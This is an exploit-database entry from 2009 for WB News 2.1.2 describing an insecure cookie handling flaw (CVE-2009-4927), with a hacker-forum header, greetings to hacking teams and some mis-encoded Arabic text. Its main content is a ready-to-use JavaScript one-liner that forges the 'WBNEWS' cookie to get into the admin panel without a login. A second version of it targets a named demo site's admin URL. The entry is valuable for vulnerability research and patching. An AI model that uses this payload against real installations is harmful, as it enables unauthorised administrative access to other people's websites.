WB News 2.1.2 - Insecure Cookie Handling

Author: ThE g0bL!N
type: webapps
platform: php
port: 
date_added: 2009-04-19 
date_updated:  
verified: 1 
codes: OSVDB-53822;CVE-2009-4927 
tags: 
aliases:  
screenshot_url:  
application_url:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…-----------------------------

 [~]Download: http://www.webmobo.com/downloads/

 [~]Software: wb news 2.1.2
 [~]author: ThE g0bL!N


 [~] Home: WWW.h4ckf0ru.com
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s
[~] -----------------------------{ Iam MuSlIm}------------------------------

wb news 2.1.2 Insecure Cookie Handling Vulnerability
---------------------------------------
exploit:
-------
javascript:document.cookie="WBNEWS=[id];path=/";
demo
----
http://demo.webmobo.com/news/admin/
exploit for demo
----------------
javascript:document.cookie="WBNEWS=1;path=/";

[~]--------------------------------------------------------------------------------

 [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH -His0k4-
  [~]
  [~]
  [~]
  [~]

 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-20]